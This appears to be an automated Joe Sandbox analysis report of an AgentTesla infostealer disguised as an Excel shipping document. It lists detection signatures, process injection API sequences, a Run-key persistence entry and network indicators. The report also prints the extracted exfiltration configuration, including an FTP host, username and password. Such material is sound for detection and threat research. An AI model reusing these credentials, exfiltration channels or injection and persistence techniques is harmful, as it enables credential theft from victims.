Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ship Docs YINGHAI-MANE PO 240786.xlsx.exe

Overview

General Information

Sample name:Ship Docs YINGHAI-MANE PO 240786.xlsx.exe
Analysis ID:1454351
MD5:9ad1097ef6d23a86d4b9327e54fdc9bc
SHA1:517d09c1d755f08f3c5bf073d87185a801b68907
SHA256:df9e1f7fa8d1badaa7afd42cc3aac4ef5aad3a9973ee71059599325284566e67
Tags:exe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Snort IDS alert for network traffic
Yara detected AgentTesla
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Contains functionality to inject code into remote processes
Contains functionality to log keystrokes (.Net Source)
Drops executable to a common third party application directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • adobe.exe (PID: 3844 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: 9AD1097EF6D23A86D4B9327E54FDC9BC)
    • adobe.exe (PID: 6332 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: 9AD1097EF6D23A86D4B9327E54FDC9BC)
  • adobe.exe (PID: 6204 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: 9AD1097EF6D23A86D4B9327E54FDC9BC)
    • adobe.exe (PID: 6672 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: 9AD1097EF6D23A86D4B9327E54FDC9BC)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://s4.serv00.com", "Username": "f2241_dol", "Password": "Doll900#@"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000003.00000002.1973196935.000000000330C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000003.00000002.1970186494.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000003.00000002.1970186494.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000001.00000002.4198295133.0000000002B9C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000008.00000002.4198576799.0000000002BBC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 20 entries
              SourceRuleDescriptionAuthorStrings
              0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.3e4a770.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.3e4a770.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.3e4a770.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x32162:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x321d4:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x3225e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x322f0:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x3235a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x323cc:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x32462:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x324f2:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.3e4a770.0.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                  • 0x2f4ad:$s2: GetPrivateProfileString
                  • 0x2eb59:$s3: get_OSFullName
                  • 0x301ab:$s5: remove_Key
                  • 0x30371:$s5: remove_Key
                  • 0x31230:$s6: FtpWebRequest
                  • 0x32144:$s7: logins
                  • 0x326b6:$s7: logins
                  • 0x35399:$s7: logins
                  • 0x35479:$s7: logins
                  • 0x36dca:$s7: logins
                  • 0x36013:$s9: 1.85 (Hash, version 2, native byte-order)
                  0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.3e0f140.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 23 entries

                    System Summary

                    barindex
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe", CommandLine: "C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe", CommandLine|base64offset|contains: ,, Image: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe, NewProcessName: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe, OriginalFileName: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe", ProcessId: 6892, ProcessName: Ship Docs YINGHAI-MANE PO 240786.xlsx.exe
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\adobe\adobe.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe, ProcessId: 6968, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\adobe
                    Timestamp:06/10/24-02:45:09.894395
                    SID:2855542
                    Source Port:49733
                    Destination Port:63293
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:06/10/24-02:45:22.633258
                    SID:2029927
                    Source Port:49735
                    Destination Port:21
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:06/10/24-02:45:23.375348
                    SID:2851779
                    Source Port:49738
                    Destination Port:63241
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:06/10/24-02:45:30.506071
                    SID:2029927
                    Source Port:49744
                    Destination Port:21
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:06/10/24-02:46:44.543119
                    SID:2851779
                    Source Port:49747
                    Destination Port:63852
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:06/10/24-02:45:31.250198
                    SID:2851779
                    Source Port:49745
                    Destination Port:65089
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:06/10/24-02:45:09.894395
                    SID:2851779
                    Source Port:49733
                    Destination Port:63293
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:06/10/24-02:45:31.250198
                    SID:2855542
                    Source Port:49745
                    Destination Port:65089
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:06/10/24-02:45:09.156084
                    SID:2029927
                    Source Port:49732
                    Destination Port:21
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:06/10/24-02:45:23.375348
                    SID:2855542
                    Source Port:49738
                    Destination Port:63241
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.3e0f140.1.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://s4.serv00.com", "Username": "f2241_dol", "Password": "Doll900#@"}
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeReversingLabs: Detection: 42%
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeVirustotal: Detection: 50%Perma Link
                    Source: Ship Docs YINGHAI-MANE PO 240786.xlsx.exeReversingLabs: Detection: 42%
                    Source: Ship Docs YINGHAI-MANE PO 240786.xlsx.exeVirustotal: Detection: 50%Perma Link
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: Ship Docs YINGHAI-MANE PO 240786.xlsx.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49731 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49734 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49743 version: TLS 1.2
                    Source: Ship Docs YINGHAI-MANE PO 240786.xlsx.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Networking

                    barindex
                    Source: TrafficSnort IDS: 2029927 ET TROJAN AgentTesla Exfil via FTP 192.168.2.4:49732 -> 213.189.52.181:21
                    Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49733 -> 213.189.52.181:63293
                    Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49733 -> 213.189.52.181:63293
                    Source: TrafficSnort IDS: 2029927 ET TROJAN AgentTesla Exfil via FTP 192.168.2.4:49735 -> 213.189.52.181:21
                    Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49738 -> 213.189.52.181:63241
                    Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49738 -> 213.189.52.181:63241
                    Source: TrafficSnort IDS: 2029927 ET TROJAN AgentTesla Exfil via FTP 192.168.2.4:49744 -> 213.189.52.181:21
                    Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49745 -> 213.189.52.181:65089
                    Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49745 -> 213.189.52.181:65089
                    Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49747 -> 213.189.52.181:63852
                    Source: global trafficTCP traffic: 213.189.52.181 ports 63241,65089,63852,1,2,21,63293
                    Source: global trafficTCP traffic: 192.168.2.4:49733 -> 213.189.52.181:63293
                    Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
                    Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
                    Source: Joe Sandbox ViewASN Name: ECO-ATMAN-PLECO-ATMAN-PL ECO-ATMAN-PLECO-ATMAN-PL
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownFTP traffic detected: 213.189.52.181:21 -> 192.168.2.4:49732 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 9 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 9 of 150 allowed.220-Local time is now 02:45. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 9 of 150 allowed.220-Local time is now 02:45. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 9 of 150 allowed.220-Local time is now 02:45. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 15 minutes of inactivity.
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                    Source: global trafficDNS traffic detected: DNS query: s4.serv00.com
                    Source: adobe.exe, 00000003.00000002.1977572355.000000000697B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                    Source: Ship Docs YINGHAI-MANE PO 240786.xlsx.exe, 00000001.00000002.4198295133.0000000002B9C000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000003.00000002.1973196935.000000000330C000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4198576799.0000000002BBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s4.serv00.com
                    Source: Ship Docs YINGHAI-MANE PO 240786.xlsx.exe, 00000001.00000002.4198295133.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000003.00000002.1973196935.0000000003291000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4198576799.0000000002B4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Ship Docs YINGHAI-MANE PO 240786.xlsx.exe, 00000000.00000002.1751703167.0000000003D35000.00000004.00000800.00020000.00000000.sdmp, Ship Docs YINGHAI-MANE PO 240786.xlsx.exe, 00000000.00000002.1752622729.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, adobe.exe, 00000003.00000002.1970186494.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: Ship Docs YINGHAI-MANE PO 240786.xlsx.exe, 00000000.00000002.1751703167.0000000003D35000.00000004.00000800.00020000.00000000.sdmp, Ship Docs YINGHAI-MANE PO 240786.xlsx.exe, 00000000.00000002.1752622729.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, Ship Docs YINGHAI-MANE PO 240786.xlsx.exe, 00000001.00000002.4198295133.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000003.00000002.1970186494.0000000000402000.00000040.00000400.00020000.00000000.sdmp, adobe.exe, 00000003.00000002.1973196935.0000000003291000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4198576799.0000000002B4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                    Source: Ship Docs YINGHAI-MANE PO 240786.xlsx.exe, 00000001.00000002.4198295133.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000003.00000002.1973196935.0000000003291000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4198576799.0000000002B4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: Ship Docs YINGHAI-MANE PO 240786.xlsx.exe, 00000001.00000002.4198295133.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000003.00000002.1973196935.0000000003291000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4198576799.0000000002B4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                    Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49731 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49734 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49743 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.3e0f140.1.raw.unpack, JovGVW.cs.Net Code: _5PXjwm
                    Source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.3e4a770.0.raw.unpack, JovGVW.cs.Net Code: _5PXjwm
                    Source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.52e0000.2.raw.unpack, JovGVW.cs.Net Code: _5PXjwm
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\adobe\adobe.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\adobe\adobe.exeJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                    System Summary

                    barindex
                    Source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.3e4a770.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.3e4a770.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.3e0f140.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.3e0f140.1.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.52e0000.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.52e0000.2.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.3e4a770.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.3e4a770.0.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 3.2.adobe.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 3.2.adobe.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.52e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.52e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.3e0f140.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.3e0f140.1.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 00000000.00000002.1752622729.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 00000000.00000002.1752622729.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeCode function: 0_2_052D0054 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,0_2_052D0054
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeCode function: 0_2_052D0000 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,0_2_052D0000
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 2_2_01160054 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,2_2_01160054
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 2_2_01160000 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,2_2_01160000
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 7_2_02410054 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,7_2_02410054
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 7_2_02410000 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,7_2_02410000
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeCode function: 1_2_02B04A901_2_02B04A90
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeCode function: 1_2_02B03E781_2_02B03E78
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeCode function: 1_2_02B041C01_2_02B041C0
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeCode function: 1_2_066C1BC41_2_066C1BC4
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeCode function: 1_2_066C28A81_2_066C28A8
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeCode function: 1_2_066C289B1_2_066C289B
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeCode function: 1_2_066C359A1_2_066C359A
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeCode function: 1_2_066C1BB81_2_066C1BB8
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeCode function: 1_2_067230181_2_06723018
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeCode function: 1_2_0672C0F81_2_0672C0F8
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeCode function: 1_2_067261601_2_06726160
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeCode function: 1_2_067251501_2_06725150
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeCode function: 1_2_0672AD901_2_0672AD90
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeCode function: 1_2_067278F81_2_067278F8
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeCode function: 1_2_067272181_2_06727218
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeCode function: 1_2_067223401_2_06722340
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeCode function: 1_2_0672E3281_2_0672E328
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeCode function: 1_2_067200401_2_06720040
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeCode function: 1_2_067200071_2_06720007
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeCode function: 1_2_0672584F1_2_0672584F
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_0194E8A83_2_0194E8A8
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_0194B8053_2_0194B805
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_01944A903_2_01944A90
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_01943E783_2_01943E78
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_019441C03_2_019441C0
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_06D227503_2_06D22750
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_06D27CF83_2_06D27CF8
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_06D255503_2_06D25550
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_06D265603_2_06D26560
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_06D2C0F83_2_06D2C0F8
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_06D2B1A83_2_06D2B1A8
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_06D276183_2_06D27618
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_06D25C603_2_06D25C60
